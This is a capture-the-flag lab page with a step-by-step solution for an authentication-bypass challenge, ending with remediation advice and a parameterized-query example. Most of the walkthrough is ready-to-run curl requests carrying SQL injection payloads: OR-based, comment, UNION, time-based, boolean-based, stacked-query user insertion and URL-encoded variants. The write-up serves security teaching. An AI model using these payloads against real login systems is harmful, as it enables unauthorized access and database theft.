Avatar

Labs / Auth Bypass

  • Challenge
  • Released 24 Jul 2025

Auth Bypass

Start the machine, hack the system, and find the hidden flags to complete this challenge and earn points!

1
Flags
1
Points
Challenge
Solution Available
Free Access
Start Lab Environment

Launch your dedicated AWS machine to begin hacking

~1-2 min setup
AWS dedicated
Private instance
Industry standard
Challenge

Auth Bypass - Complete Solution Walkthrough

Step 1: Initial Discovery and Assessment

  1. Challenge Presentation: Access the challenge at <target-ip>:80 to understand the objectives and scenario.
  2. Service Discovery: Scan for open ports and services:
nmap -p 1-10000 <target-ip>
  1. Expected Findings: You should discover:
    • Port 80: Challenge presentation page
    • Port 8080: The target authentication system
  2. Initial Reconnaissance: Access the authentication system:
curl http://<target-ip>:8080/

Step 2: Authentication System Analysis

  1. Web Interface Analysis: The system presents a login form with username and password fields.
  2. Authentication Mechanism: The application uses a standard username/password authentication system.
  3. Backend Analysis: Based on the behavior, the system appears to use SQL database queries for user authentication.
  4. Normal Authentication Test: Try legitimate login attempts to understand the system behavior:
# Test with valid format but wrong credentials
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin&password=password"

Step 3: SQL Injection Testing

  1. Hypothesis: If the application constructs SQL queries using user input without proper sanitization, it may be vulnerable to SQL injection.
  2. Basic SQL Injection Test: Test for SQL injection by using single quotes to break the SQL syntax:
# Test for SQL injection vulnerability
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin'&password=test"
  1. SQL Error Analysis: Look for SQL error messages in the response that might indicate vulnerability.
  2. Comment-Based Injection Strategy: The SQL comment tag -- can be used to ignore the rest of the query, effectively bypassing the password check entirely.
  3. Authentication Bypass Payloads: Test classic SQL injection authentication bypass payloads:
# Classic OR-based authentication bypass
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin' OR '1'='1&password=anything"

# Alternative payload
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin' OR 1=1--&password=test"

# Comment-based bypass
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin'--&password=anything"

Step 4: Successful Authentication Bypass

  1. Working Payload: The following payload should successfully bypass authentication:
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin' OR '1'='1&password=test"
  1. Expected Response: Upon successful bypass, the application should return a success message containing the flag.
  2. Alternative Successful Payloads: Other payloads that should work:
# Using UNION injection approach
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=' UNION SELECT 1--&password=test"

# Comment out password check
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin'/*&password=*/OR/**/1=1--"

Step 5: Flag Extraction

  1. Flag Discovery: Upon successful authentication bypass, the application displays the flag in the response.
  2. Flag Verification: The flag will be displayed in UUID format when the SQL injection is successful.
  3. Web Browser Method: You can also perform the attack using a web browser by manually entering the SQL injection payload in the username field.

Step 6: Understanding the Vulnerability

  1. Root Cause Analysis: The vulnerability exists because the application constructs SQL queries by directly concatenating user input without proper parameterization or sanitization.
  2. Vulnerable Code Pattern: The problematic SQL query likely looks like:
# Vulnerable SQL construction
query = f"SELECT * FROM users WHERE username='{username}' AND password='{password}'"
  1. Attack Mechanism: By injecting SQL syntax into the username field, attackers can modify the query logic to always return true, bypassing authentication.
  2. Modified Query Example: When the payload admin' OR '1'='1 is used:
# Resulting malicious query
SELECT * FROM users WHERE username='admin' OR '1'='1' AND password='test'

Step 7: Advanced SQL Injection Techniques

  1. Time-Based Blind SQL Injection: If the application doesn't show direct output, you can use time delays:
# Time-based payload
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin'; WAITFOR DELAY '0:0:5'--&password=test"
  1. Boolean-Based Blind SQL Injection: Test logical conditions:
# Boolean-based payload
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin' AND (SELECT COUNT(*) FROM users)>0--&password=test"
  1. Database Enumeration: Extract database information:
# Extract database version
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=' UNION SELECT @@version--&password=test"

Step 8: Alternative Attack Vectors

  1. Password Field Injection: Test SQL injection in the password field:
# Password field SQL injection
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin&password=' OR '1'='1"
  1. Stacked Queries: If the database supports multiple statements:
# Stacked query injection
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin'; INSERT INTO users VALUES('hacker','pass')--&password=test"
  1. URL Encoding: If special characters are filtered, use URL encoding:
# URL encoded payload
curl -X POST http://<target-ip>:8080/login \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "username=admin%27%20OR%20%271%27%3D%271&password=test"

Security Implications and Remediation

  1. Vulnerability Classification: This is a critical SQL injection vulnerability (CWE-89) that allows authentication bypass and potentially data exfiltration.
  2. Impact Assessment: Successful exploitation allows:
    • Complete authentication bypass
    • Unauthorized access to protected resources
    • Potential data extraction from the database
    • Possible privilege escalation
  3. Proper Remediation:
    • Use parameterized queries/prepared statements
    • Implement input validation and sanitization
    • Apply principle of least privilege for database access
    • Use stored procedures with proper parameter handling
    • Implement Web Application Firewalls (WAF)
    • Regular security code reviews and testing
  4. Secure Implementation Example:
# Secure parameterized query (Python example)
import sqlite3

def authenticate_user(username, password):
    conn = sqlite3.connect('database.db')
    cursor = conn.cursor()
    
    # Secure parameterized query
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    cursor.execute(query, (username, password))
    
    result = cursor.fetchone()
    conn.close()
    
    return result is not None

Tools and Techniques Summary

  • Manual Testing: curl, web browser, manual payload crafting
  • Automated Tools: sqlmap, Burp Suite, OWASP ZAP
  • Payload Types: OR-based, UNION-based, comment injection, time-based blind
  • Detection Methods: Error-based, boolean-based, time-based responses
  • Database Enumeration: Version detection, table discovery, data extraction